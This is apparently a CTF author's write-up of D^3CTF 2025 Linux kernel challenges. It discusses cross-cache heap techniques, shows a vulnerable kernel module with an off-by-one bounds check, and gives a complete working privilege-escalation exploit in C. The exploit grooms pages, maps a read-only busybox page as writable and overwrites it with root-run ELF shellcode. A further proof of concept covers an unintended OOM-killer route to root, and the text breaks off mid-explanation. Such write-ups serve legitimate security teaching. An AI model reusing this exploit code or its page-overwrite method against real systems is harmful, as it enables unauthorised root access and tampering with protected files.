And if you pay enough attention to the kernel itself, you may notice that I didn’t enable the CONFIG_SLAB_BUCKETS configuration as what d3kshrm‘s kernel does, which is a mitigation against the heap spraying. Although it is not difficult to bypass this mitigation by doing the full heap spraying instead of doing the precise object allocation, as the D^3CTF this year is only planned to be 24 hours, I hope that this challenge could be the one for you to do the “sign in” for pwn easily, just like the old introduction of d3kheap back to D^3CTF 2022. Therefore this challenge is originally designed to not be with an extremely high difficulty.

For the final result of this challenge, most of players had adopted the expected solution, which is to do the cross-cache attack as my expectation. I’m happy to see that many of participated CTFers have known how to take advantage of such advanced techniques to do the exploitation, which can be thought to be the general approach for almost arbitrary heap vulnerabilities. As the cross-cache attack has been widely used in recent years, I’m convince that this must be or even have already become the base strategy and the standard start point for doing the Linux kernel exploitation towards heap vulnerabilities. There is a pity is that I FORGOT to turn the CONFIG_MEMCG on to separate GFP_KERNEL and GFP_KERNEL_ACCOUNT into different kmem_cache, as you can see that I have adopted a multi-stage exploitation that manipulate with msg_msg and pipe_buffer heavily, while some players just simply use the sk_buff to read and write the UAF pipe_buffer directly. Another pity is that the team We_0wn_y0u who got the first blood for d3kheap2 had ONLY done the d3kheap2 in the D^3CTF 2025 and seems to be disappeared after that, and I temporarily don’t know their detailed solution.

Now let’s talk about those State-Of-The-Art academic techniques like Dirty PageTable (SLUBStick, I don’t know why we have two names here and I’m still not sure whether the author is the same , as the original blog of the Dirty PageTable had been removed, and I did not have to much time to distinguish) and DirtyPage (also named Page Spray by its authors) whose base technique is also the cross-cache attack : Are they powerful and capable enough to be used in this challenge? The answer seems to be NOT EASY, as such approaches are designed for different vulnerability patterns.

For the SLUBStick, we will need additional capabilities to do the UAF write for at least several times, which require us to construct complex and multi-stage cross-cache page freeing and reclaiming, rising the difficulty of constructing the exploitation to a high level while lower down the usability and stability.
DirtyPage says that “it takes a further step” by confusing the object counting on a SLUB (refer to its Figure 1: Page Spray Exploit Model for Double Free.), however it is useless to overwrite an object with no functionalities. In my opinion it might be more capable for attacking those kernel objects with specific functionalities (like file or pipe_buffer?), but if the target object lacks enough capabilities for the later attacking stages, such exploitation might not be able to be applied.

Hence, pure cross-cache attack might be more capable and usable for d3kheap2 in my thoughts , but anyway thanks to them for developing such powerful exploitation techniques that have brought our views to another different aspect.

Another point is that assistant techniques like timing side-channel attack to predict the time of allocating SLUB pages like the Pspray do not have too much effects for the general kernel heap exploitation not limited to the d3kheap2. A core reason is that with the existence of mitigation like CONFIG_RANDOM_KMALLOC_CACHES in the kernel mainline, it does not mean to be important for us to know whether ONE NEW SLUB pages has been allocated. As our object allocation will always comes from different dedicated pools randomly, doing the heap spray with approximate estimation seems to be the only capable solution, and doing the precise allocation has become almost impossible. Though this mitigation was not enabled in the d3kheap2, I still want to talk about something more related to the real-world exploitation. Hope that you will not mind : )

Though I still have many thoughts about the Linux kernel exploitation, but it seems that this passage has become too long at this moment, so let’s just stop here. Anyway I would like to thank everyone who has participated in this CTF and has tried to solve my challenge, no matter you’ve got the flag or not. I’m still so sorry that I did not present you with something as cool as the d3kcache due to multiple reasons including limited time, hope that you will not mind : )

0x02. D3KSHRM | 1 Solve

You can get the original attachment at https://github.com/arttnba3/D3CTF2025_d3kshrm.

You know what? Sharing is always a good moral quality. That’s the reason why I’m going to share some of my precious memories with all of you!

Copyright(c) 2025 <ディーキューブ・シーティーエフカーネル Pwn 製作委員会>

Author: arttnba3 @ L-team x El3ctronic x D^3CTF

0x00. Introduction

In this challenge we created a kernel module named d3kshrm.ko , which can provide users with functionalities to create shared memory. Through the ioctl() interface we have the following capabilities:

Create a new shared memory with specific size
Bind to an existed shared memory
Unbind from current shared memory
Delete an existed shared memory

And to access the shared memory, we can map the file descriptor after binding it, where the vulnerability locates. Due to the lack of checking on the bound of d3kshrm::pages, an attacker can treat the next 8 bytes next to the d3kshrm::pages as a pointer to struct page and map it to the user address space.

static vm_fault_t d3kshrm_vm_fault(struct vm_fault *vmf)
{
    struct d3kshrm_struct *d3kshrm;
    struct vm_area_struct *vma;
    vm_fault_t res;

    vma = vmf->vma;
    d3kshrm = (struct d3kshrm_struct *) vma->vm_private_data;

    spin_lock(&d3kshrm->lock);

    /* vulnerability here */
    // if (vmf->pgoff >= d3kshrm->page_nr) {
    if (vmf->pgoff > d3kshrm->page_nr) {
        res = VM_FAULT_SIGBUS;
        goto ret;
    }

    get_page(d3kshrm->pages[vmf->pgoff]);
    vmf->page = d3kshrm->pages[vmf->pgoff];
    res = 0;

ret:
    spin_unlock(&d3kshrm->lock);

    return res;
}

Exploitation

As the d3kshrm::pages will be allocated from an isolated kmem_cache, we have to use page-level heap fengshui to manipulate page-level memory to try to map page pointers outside the challenge functionalities, which is because we can not exploit pages directly by double-mapping as the reference number exists as guard to prevent us to create page-level double free directly. Hence our available exploitation strategy is to map those pages originally with read-only permissions to the user space, which will remind us of the CVE-2023-2008 that also abusing out-of-bound page mapping to do the DirtyPage-like attack. Here comes our exploitation strategy:

Use page-level heap fengshui to re-arrange page-level memory to put the SLUB pages of the isolated kmem_cache of the challenge between two SLUB pages of the victim objects. Here we chose the pipe_buffer as the victim as it has a pointer to the struct page at the start of the structure, which makes us possible to do the out-of-bound mapping.
Open the file with read-only permission and use splice() function to store the first page of the target file into the pipe_buffer.
Exploit the vulnerability to do the out-of-bound page mapping to map the page originally with read-only permission to the user space with read & write permissions. Hence the power of overwriting read-only file will be granted to us.

I finally chose the /sbin/poweroff (which is the symbolic to the busybox) as our victim file, as the final line of the /etc/init.d/rcS is to execute the /sbin/poweroff with root privilege, which will grant us with the power to execute arbitrary code with root privilege. The final exploitation is in exo.c in this repository, whose successful rate is at approximately 84.63% (result after more than 2048 times automatic local test), and I’m convinced that there must be a room to rise it to over 95%+ as I hadn’t adopt complex and advanced page-level heap fengshui procedure yet.

/**
 * Copyright (c) 2025 arttnba3 <arttnba@gmail.com>
 * 
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
**/

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <sched.h>
#include <errno.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/socket.h>

/**
 * Kernel Pwn Infrastructures
**/

#define SUCCESS_MSG(msg)    "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg)       "\033[34m\033[1m" msg "\033[0m"
#define ERROR_MSG(msg)      "\033[31m\033[1m" msg "\033[0m"

#define log_success(msg)    puts(SUCCESS_MSG(msg))
#define log_info(msg)       puts(INFO_MSG(msg))
#define log_error(msg)      puts(ERROR_MSG(msg))

void err_exit(char *msg)
{
    printf(ERROR_MSG("[x] Error at: ") "%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf(SUCCESS_MSG("[*] Process binded to core ") "%d\n", core);
}

void get_root_shell(void)
{
    if(getuid()) {
        log_error("[x] Failed to get the root!");
        sleep(5);
        exit(EXIT_FAILURE);
    }

    log_success("[+] Successful to get the root.");
    log_info("[*] Execve root shell now...");

    system("/bin/sh");

    /* to exit the process normally, instead of potential segmentation fault */
    exit(EXIT_SUCCESS);
}

int get_msg_queue(void)
{
    return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

/**
 * the msgp should be a pointer to the `struct msgbuf`,
 * and the data should be stored in msgbuf.mtext
 */
int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    ((struct msgbuf*)msgp)->mtype = msgtyp;
    return msgsnd(msqid, msgp, msgsz, 0);
}

#ifndef MSG_COPY
    #define MSG_COPY 040000
#endif

/* for MSG_COPY, `msgtyp` means to read no.msgtyp msg_msg on the queue */
int peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    return msgrcv(msqid, msgp, msgsz, msgtyp, 
                  MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

int unshare_setup(void)
{
    char edit[0x100];
    int tmp_fd;

    if (unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET) < 0) {
        log_error("[x] Unable to create new namespace for PGV subsystem");
        return -EPERM;
    }

    tmp_fd = open("/proc/self/setgroups", O_WRONLY);
    write(tmp_fd, "deny", strlen("deny"));
    close(tmp_fd);

    tmp_fd = open("/proc/self/uid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", getuid());
    write(tmp_fd, edit, strlen(edit));
    close(tmp_fd);

    tmp_fd = open("/proc/self/gid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", getgid());
    write(tmp_fd, edit, strlen(edit));
    close(tmp_fd);

    return 0;
}

/**
 * pgv pages sprayer related 
 * not that we should create two process:
 * - the parent is the one to send cmd and get root
 * - the child creates an isolate userspace by calling unshare_setup(),
 *      receiving cmd from parent and operates it only
**/

#define PGV_SOCKET_MAX_NR 1024
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

struct tpacket_req {
    unsigned int tp_block_size;
    unsigned int tp_block_nr;
    unsigned int tp_frame_size;
    unsigned int tp_frame_nr;
};

struct pgv_page_request {
    int idx;
    int cmd;
    unsigned int size;
    unsigned int nr;
};

enum {
    PGV_CMD_ALLOC_SOCKET,
    PGV_CMD_ALLOC_PAGE,
    PGV_CMD_FREE_PAGE,
    PGV_CMD_FREE_SOCKET,
    PGV_CMD_EXIT,
};

enum tpacket_versions {
    TPACKET_V1,
    TPACKET_V2,
    TPACKET_V3,
};

int cmd_pipe_req[2], cmd_pipe_reply[2];

int create_packet_socket()
{
    int socket_fd;
    int ret;

    socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
    if (socket_fd < 0) {
        log_error("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)");
        ret = socket_fd;
        goto err_out;
    }

    return socket_fd;

err_out:
    return ret;
}

int alloc_socket_pages(int socket_fd, unsigned int size, unsigned nr)
{
    struct tpacket_req req;
    int version, ret;

    version = TPACKET_V1;
    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION, 
                     &version, sizeof(version));
    if (ret < 0) {
        log_error("[x] failed at setsockopt(PACKET_VERSION)");
        goto err_setsockopt;
    }

    memset(&req, 0, sizeof(req));
    req.tp_block_size = size;
    req.tp_block_nr = nr;
    req.tp_frame_size = 0x1000;
    req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
    if (ret < 0) {
        log_error("[x] failed at setsockopt(PACKET_TX_RING)");
        goto err_setsockopt;
    }

    return 0;

err_setsockopt:
    return ret;
}

int free_socket_pages(int socket_fd)
{
    struct tpacket_req req;
    int ret;
    
    memset(&req, 0, sizeof(req));
    req.tp_block_size = 0x3361626e;
    req.tp_block_nr = 0;
    req.tp_frame_size = 0x74747261;
    req.tp_frame_nr = 0;

    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
    if (ret < 0) {
        log_error("[x] failed at setsockopt(PACKET_TX_RING)");
        goto err_setsockopt;
    }

    return 0;

err_setsockopt:
    return ret;
}

void spray_cmd_handler(void)
{
    struct pgv_page_request req;
    int socket_fd[PGV_SOCKET_MAX_NR];
    int ret;

    /* create an isolate namespace*/
    if (unshare_setup()) {
        err_exit("FAILED to initialize PGV subsystem for page spraying!");
    }

    memset(socket_fd, 0, sizeof(socket_fd));

    /* handler request */
    do {
        read(cmd_pipe_req[0], &req, sizeof(req));

        switch (req.cmd) {
        case PGV_CMD_ALLOC_SOCKET:
            if (socket_fd[req.idx] != 0) {
                printf(ERROR_MSG("[x] Duplicate idx request: ") "%d\n",req.idx);
                ret = -EINVAL;
                break;
            }

            ret = create_packet_socket();
            if (ret < 0) {
                perror(ERROR_MSG("[x] Failed at allocating packet socket"));
                break;
            }

            socket_fd[req.idx] = ret;
            ret = 0;

            break;
        case PGV_CMD_ALLOC_PAGE:
            if (socket_fd[req.idx] == 0) {
                printf(ERROR_MSG("[x] No socket fd for idx: ") "%d\n",req.idx);
                ret = -EINVAL;
                break;
            }

            ret = alloc_socket_pages(socket_fd[req.idx], req.size, req.nr);
            if (ret < 0) {
                perror(ERROR_MSG("[x] Failed to alloc packet socket pages"));
                break;
            }

            break;
        case PGV_CMD_FREE_PAGE:
            if (socket_fd[req.idx] == 0) {
                printf(ERROR_MSG("[x] No socket fd for idx: ") "%d\n",req.idx);
                ret = -EINVAL;
                break;
            }

            ret = free_socket_pages(socket_fd[req.idx]);
            if (ret < 0) {
                perror(ERROR_MSG("[x] Failed to free packet socket pages"));
                break;
            }

            break;
        case PGV_CMD_FREE_SOCKET:
            if (socket_fd[req.idx] == 0) {
                printf(ERROR_MSG("[x] No socket fd for idx: ") "%d\n",req.idx);
                ret = -EINVAL;
                break;
            }

            close(socket_fd[req.idx]);

            break;
        case PGV_CMD_EXIT:
            log_info("[*] PGV child exiting...");
            ret = 0;
            break;
        default:
            printf(
                ERROR_MSG("[x] PGV child got unknown command : ")"%d\n",
                req.cmd
            );
            ret = -EINVAL;
            break;
        }

        write(cmd_pipe_reply[1], &ret, sizeof(ret));
    } while (req.cmd != PGV_CMD_EXIT);
}

void prepare_pgv_system(void)
{
    /* pipe for pgv */
    pipe(cmd_pipe_req);
    pipe(cmd_pipe_reply);
    
    /* child process for pages spray */
    if (!fork()) {
        spray_cmd_handler();
    }
}

int create_pgv_socket(int idx)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = PGV_CMD_ALLOC_SOCKET,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    return ret;
}

int destroy_pgv_socket(int idx)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = PGV_CMD_FREE_SOCKET,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    return ret;
}

int alloc_page(int idx, unsigned int size, unsigned int nr)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = PGV_CMD_ALLOC_PAGE,
        .size = size,
        .nr = nr,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    return ret;
}

int free_page(int idx)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = PGV_CMD_FREE_PAGE,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(req));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    usleep(10000);

    return ret;
}

/**
 * Challenge Interface
**/

#define CMD_CREATE_D3KSHRM    0x3361626e
#define CMD_DELETE_D3KSHRM    0x74747261
#define CMD_SELECT_D3KSHRM    0x746e6162
#define CMD_UNBIND_D3KSHRM    0x33746172

#define MAX_PAGE_NR 0x100

int chal_fd;

int d3kshrm_create(int fd, unsigned long page_nr)
{
    return ioctl(fd, CMD_CREATE_D3KSHRM, page_nr);
}

int d3kshrm_delete(int fd, unsigned long idx)
{
    return ioctl(fd, CMD_DELETE_D3KSHRM, idx);
}

int d3kshrm_select(int fd, unsigned long idx)
{
    return ioctl(fd, CMD_SELECT_D3KSHRM, idx);
}

int d3kshrm_unbind(int fd)
{
    return ioctl(fd, CMD_UNBIND_D3KSHRM);
}

/**
 * Exploitation procedure
**/

#define PIPE_SPRAY_NR 126

int prepare_pipe(int pipe_fd[PIPE_SPRAY_NR][2])
{
    int err;

    for (int i = 0; i < PIPE_SPRAY_NR; i++) {
        if ((err = pipe(pipe_fd[i])) < 0) {
            printf(
                ERROR_MSG("[x] failed to alloc ")"%d"ERROR_MSG(" pipe!\n"), i
            );
            return err;
        }
    }

    return 0;
}

int expand_pipe(int pipe_fd[PIPE_SPRAY_NR][2], size_t size)
{
    int err;

    for (int i = 0; i < PIPE_SPRAY_NR; i++) {
        if ((err = fcntl(pipe_fd[i][1], F_SETPIPE_SZ, size)) < 0) {
            printf(
                ERROR_MSG("[x] failed to expand ")"%d"ERROR_MSG(" pipe!\n"), i
            );
            return err;
        }
    }

    return 0;
}

ssize_t splice_pipe(int pipe_fd[PIPE_SPRAY_NR][2], int victim_fd)
{
    ssize_t err;
    loff_t offset;

    for (int i = 0; i < PIPE_SPRAY_NR; i++) {
        offset = 0;
        if ((err = splice(victim_fd,&offset,pipe_fd[i][1],NULL,0x1000,0)) < 0) {
            printf(
                ERROR_MSG("[x] failed to splice ")"%d"ERROR_MSG(" pipe!\n"),i
            );
            return err;
        }
    }

    return 0;
}

#define PBF_SZ_PAGE_NR (0x1000 / 8)

uint8_t shellcode[] = {
    /* ELF header */

    // e_ident[16]
    0x7f, 0x45, 0x4c, 0x46, /* Magic number "\x7fELF" */
    0x02,   /* ELF type: 64-bit */
    0x01,   /* ELF encode: LSB */
    0x01,   /* ELF version: current */
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,   /* Reserve */
    // e_type: ET_EXEC
    0x02, 0x00,
    // e_machine: AMD x86-64
    0x3e, 0x00,
    // e_version: 1
    0x01, 0x00, 0x00, 0x00,
    // e_entry: 0x0000000000400078
    0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
    // e_phoff: 0x40
    0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    // e_shoff: 0
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    // e_flags: 0
    0x00, 0x00, 0x00, 0x00,
    // e_ehsize: 0x40
    0x40, 0x00,
    // e_phentsize: 0x38
    0x38, 0x00,
    // e_phnum: 1
    0x01, 0x00,
    // e_shentsize: 0
    0x00, 0x00,
    // e_shnum: 0
    0x00, 0x00,
    // e_shstrndx: 0
    0x00, 0x00,

    /* Program Header Table[0] */

    // p_type: PT_LOAD
    0x01, 0x00, 0x00, 0x00,
    // p_flags: PF_R | PF_W | PF_X
    0x07, 0x00, 0x00, 0x00,
    // p_offset: 0
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    // p_vaddr: 0x0000000000400000
    0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
    // p_paddr: 0x0000000000400000
    0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
    // p_filesz: 0xD5
    0xD5, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    // p_memsz: 0xF2
    0xF2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    // p_align: 0x1000
    0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

    /* Sections[0]: Shellcode */

    // opening "/flag" and read

    // xor rax, rax
    0x48, 0x31, 0xc0,
    // push rax
    0x50,
    // movabs rax, 0x67616c662f # "/flag"
    0x48, 0xb8, 0x2f, 0x66, 0x6c, 0x61, 0x67, 0x00, 0x00, 0x00,
    // push rax
    0x50,
    // mov rax, 0x02
    0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00,
    // mov rdi, rsp
    0x48, 0x89, 0xe7,
    // xor rsi, rsi
    0x48, 0x31, 0xf6,
    // syscall
    0x0f, 0x05,
    // mov rdi, rax
    0x48, 0x89, 0xc7,
    // xor rax, rax
    0x48, 0x31, 0xc0,
    // sub, rsp, 0x100
    0x48, 0x81, 0xec, 0x00, 0x01, 0x00, 0x00,
    // mov rsi, rsp
    0x48, 0x89, 0xe6,
    // mov rdi, 0x100
    0x48, 0xc7, 0xc2, 0x00, 0x01, 0x00, 0x00,
    // syscall
    0x0f, 0x05,
    // mox rax, 0x1
    0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00,
    // mox rdi, 0x1
    0x48, 0xc7, 0xc7, 0x01, 0x00, 0x00, 0x00,
    // mox rsi, rsp
    0x48, 0x89, 0xe6,
    // mox rdx, 0x100
    0x48, 0xc7, 0xc2, 0x00, 0x01, 0x00, 0x00,
    // syscall
    0x0f, 0x05,
    // xor rdi, rdi
    0x48, 0x31, 0xff,
    // mov rax, 0x3c
    0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00,
    // syscall
    0x0f, 0x05,
};

#define PAGE8_SPRAY_NR 0x100

int prepare_pgv_pages(void)
{
    int errno;

    for (int i = 0; i < PAGE8_SPRAY_NR; i++) {
        if ((errno = create_pgv_socket(i)) < 0) {
            printf(ERROR_MSG("[x] Failed to allocate socket: ") "%d\n", i);
            return errno;
        }

        if ((errno = alloc_page(i, 0x1000 * 8, 1)) < 0) {
            printf(ERROR_MSG("[x] Failed to alloc pages on socket: ")"%d\n", i);
            return errno;
        }
    }

    return 0;
}

#define MSG_QUEUE_NR 0x100
#define MSG_SPRAY_NR 2

int prepare_msg_queue(int msqid[MSG_QUEUE_NR])
{
    for (int i = 0; i < MSG_QUEUE_NR; i++) {
        if ((msqid[i] = get_msg_queue()) < 0) {
            printf(
                ERROR_MSG("[x] Unable to create ")"%d"ERROR_MSG(" msg_queue\n"),
                i
            );
            return msqid[i];
        }
    }

    return 0;
}

int spray_msg_msg(int msqid[MSG_QUEUE_NR])
{
    char buf[0x2000];
    int err;

    for (int i = 0; i < MSG_QUEUE_NR; i++) {
        for (int j = 0; j < MSG_SPRAY_NR; j++) {
            if ((err = write_msg(msqid[i],buf,0xF00,0x3361626e74747261+i)) < 0){
                return err;
            }
        }
    }

    return 0;
}

#define D3KSHRM_SLUB_OBJ_NR 8
#define D3KSHRM_SPRAY_NR (D3KSHRM_SLUB_OBJ_NR * 2)

void exploit(void)
{
    int pipe_fd1[PIPE_SPRAY_NR][2], pipe_fd2[PIPE_SPRAY_NR][2];
    int msqid[MSG_QUEUE_NR];
    int d3kshrm_fd[D3KSHRM_SPRAY_NR], d3kshrm_idx[D3KSHRM_SPRAY_NR];
    int victim_fd;
    char *oob_buf[D3KSHRM_SPRAY_NR];
    void *victim_buf;

    log_info("[*] Preparing...");

    bind_core(0);
    prepare_pgv_system();

    victim_fd = open("/sbin/poweroff", O_RDONLY);
    if (victim_fd < 0) {
        perror("Failed to open target victim file");
        exit(EXIT_FAILURE);
    }

    log_info("[*] Allocating msg_queue for clearing kmem_cache...");
    if (prepare_msg_queue(msqid) < 0) {
        err_exit("FAILED to create msg_queue!");
    }

    log_info("[*] Allocating pipe_fd1 group...");
    if (prepare_pipe(pipe_fd1) < 0) {
        perror(ERROR_MSG("Failed to spray pipe_buffer"));
        err_exit("FAILED to prepare first part of pipes.\n");
    }

    log_info("[*] Allocating pipe_fd2 group...");
    if (prepare_pipe(pipe_fd2) < 0) {
        perror(ERROR_MSG("Failed to spray pipe_buffer"));
        err_exit("FAILED to prepare second part of pipes.\n");
    }

    log_info("[*] Preparing D3KSHRM files...");
    for (int i = 0; i < D3KSHRM_SPRAY_NR; i++) {
        if ((d3kshrm_fd[i] = open("/proc/d3kshrm", O_RDWR)) < 0) {
            perror(ERROR_MSG("Failed to open /proc/d3kshrm"));
            err_exit("FAILED to spray D3KSHRM files.\n");
        }
    }

    log_info("[*] Pre-allocating ONE SLUB pages for D3kSHRM...");
    if ((d3kshrm_idx[0] = d3kshrm_create(d3kshrm_fd[0], PBF_SZ_PAGE_NR)) < 0) {
        perror(ERROR_MSG("Failed to create D3KSHRM shared memory"));
        err_exit("FAILED to spray D3KSHRM shared memory.\n");
    }

    log_info("[*] Allocating pgv pages...");
    if (prepare_pgv_pages() < 0) {
        err_exit("FAILED to prepare pages on packet socket.\n");
    }

    log_info("[*] Clear previous redundant memory storage in kernel...");
    if (spray_msg_msg(msqid) < 0) {
        perror(ERROR_MSG("Failed to spray msg_msg"));
        err_exit("FAILED to clear reduncant kernel memory storage.\n");
    }

    log_info("[*] Spraying D3KSHRM buffer...");

    free_page((PAGE8_SPRAY_NR / 2) + 1);
    destroy_pgv_socket((PAGE8_SPRAY_NR / 2) + 1);

    for (int i = 1; i < D3KSHRM_SPRAY_NR; i++) {
        if ((d3kshrm_idx[i] = d3kshrm_create(d3kshrm_fd[i], PBF_SZ_PAGE_NR))<0){
            perror(ERROR_MSG("Failed to create D3KSHRM shared memory"));
            err_exit("FAILED to spray D3KSHRM shared memory.\n");
        }
    }

    log_info("[*] Expanding pipe_buffer...");

    free_page(PAGE8_SPRAY_NR / 2);
    destroy_pgv_socket(PAGE8_SPRAY_NR / 2);

    if (expand_pipe(pipe_fd1, 0x1000 * 64) < 0) {
        perror(ERROR_MSG("Failed to expand pipe_buffer"));
        err_exit("FAILED to expand first part of pipes.\n");
    }

    log_info("[*] Expanding pipe_buffer...");

    free_page((PAGE8_SPRAY_NR / 2) + 2);
    destroy_pgv_socket((PAGE8_SPRAY_NR / 2) + 2);

    if (expand_pipe(pipe_fd2, 0x1000 * 64) < 0) {
        perror(ERROR_MSG("Failed to expand pipe_buffer"));
        err_exit("FAILED to expand second part of pipes.\n");
    }

    log_info("[*] Splicing victim file into pipe group...");

    if (splice_pipe(pipe_fd1, victim_fd) < 0) {
        perror(ERROR_MSG("Failed to splice target fd"));
        err_exit("FAILED to splice victim file into pipe_fd1 group.\n");
    }

    if (splice_pipe(pipe_fd2, victim_fd) < 0) {
        perror(ERROR_MSG("Failed to splice target fd"));
        err_exit("FAILED to splice victim file into pipe_fd2 group.\n");
    }

    log_info("[*] Doing mmap and mremap...");

    for (int i = D3KSHRM_SLUB_OBJ_NR; i < D3KSHRM_SPRAY_NR; i++) {
        if (d3kshrm_select(d3kshrm_fd[i], d3kshrm_idx[i]) < 0) {
            perror(ERROR_MSG("Failed to select D3KSHRM shared memory"));
            err_exit("FAILED to select D3KSHRM shared memory.\n");
        }

        oob_buf[i] = mmap(
            NULL,
            0x1000 * PBF_SZ_PAGE_NR,
            PROT_READ | PROT_WRITE,
            MAP_FILE | MAP_SHARED,
            d3kshrm_fd[i],
            0
        );
        if (oob_buf[i] == MAP_FAILED) {
            perror(ERROR_MSG("Failed to map chal_fd"));
            err_exit("FAILED to mmap chal_fd.\n");
        }

        oob_buf[i] = mremap(
            oob_buf[i],
            0x1000 * PBF_SZ_PAGE_NR,
            0x1000 * (PBF_SZ_PAGE_NR + 1),
            MREMAP_MAYMOVE
        );
        if (oob_buf[i] == MAP_FAILED) {
            perror(ERROR_MSG("Failed to mremap oob_buf area"));
            err_exit("FAILED to mremap chal's mmap area.\n");
        }
    }

    log_info("[*] Checking for oob mapping...");

    victim_buf = NULL;
    for (int i = D3KSHRM_SLUB_OBJ_NR; i < D3KSHRM_SPRAY_NR; i++) {
        /* Examine ELF header to see whether we hit the busybox */
        if (*(size_t*) &oob_buf[i][0x1000*PBF_SZ_PAGE_NR] == 0x3010102464c457f){
            victim_buf = (void*) &oob_buf[i][0x1000*PBF_SZ_PAGE_NR];
            break;
        }
    }

    if (!victim_buf) {
        err_exit("FAILED to oob mmap pages in pipe!");
    }

    log_info("[*] Abusing OOB mmap to overwrite read-only file...");
    memcpy(victim_buf, shellcode, sizeof(shellcode));

    log_success("[+] Just enjoy :)");
}

void banner(void)
{
    puts(SUCCESS_MSG("-------- D^3CTF2025::Pwn - d3kshrm --------") "\n"
    INFO_MSG("--------    Official Exploitation   --------\n")
    INFO_MSG("--------      Author: ")"arttnba3"INFO_MSG("      --------") "\n"
    SUCCESS_MSG("-------- Local Privilege Escalation --------\n"));
}

int main(int argc, char **argv, char **envp)
{
    banner();
    exploit();
    return 0;
}

Unintended Solution

I’m so sorry that I didn’t configure the file system well, which have caused an unintended solution as a result. Before we start I’d like to thank Qanux from W&M who has found this issue by chance. To be honest the reason why unintended solution could be happened is that I configured the file system too normally.

A minimal proof-of-concept function to stably trigger the unintended solution without the challenge kernel module is as follow (for helper functions like prepare_pgv_system() and alloc_page() please refer to the exp.c):

void unintended_exploit(void)
{
    int errno;
    prepare_pgv_system();

    for (int i = 0; i < 1000; i++) {
        if ((errno = create_pgv_socket(i)) < 0) {
            printf(ERROR_MSG("[x] Failed to allocate socket: ") "%d\n", i);
            err_exit("FAILED to allocate socket!");
        }

        if ((errno = alloc_page(i, 0x1000 * 64, 64)) < 0) {
            printf(ERROR_MSG("[x] Failed to alloc pages on socket: ")"%d\n", i);
            err_exit("FAILED to allocate pages!");
        }

        printf("[*] No.%d times\n", i);
        fflush(stdout);
    }

    puts("Done!?");
}

While executing the proof-of-concept, we can notice that our process just terminated suddenly. Then we just got a root shell with no reasons:

How and why? To figure out what is happening during this procedure, let’s take a brief look at our proof-of-concept, who just simply keeps doing the memory allocation via the setsockopt() of packet socket. We all know that if the memory of a process keeps growing and occupies too much memory, there will be no enough available free memory for the system to use, thus the OOM Killer will be waken up to see whether the system have to kill a process for reclaiming its memory back.

Which process will be chosen to be killed? As we know that there are only several user land processes running in the environment, there is no doubt that the one to be possible to be killed can only comes from rcS , sh, and exploit . But who will be the guy to be chosen as the unlucky sheep? Well, the OOM Killer determines the victim target depending on multiple factors including the resource consumption, and we can check that by examining the /proc/[pid]/oom_score . The result we need is as follow (reading by a simple C function):

As we can see that the rcS and sh have the same OOM scores, the unlucky guy will be one of them as the exploit has a lower score. And as the rcS is a root process while sh is not, it seems that killing the sh does make sense? The answer is YES, BUT NOT ONLY YES. Let us see what really happened:

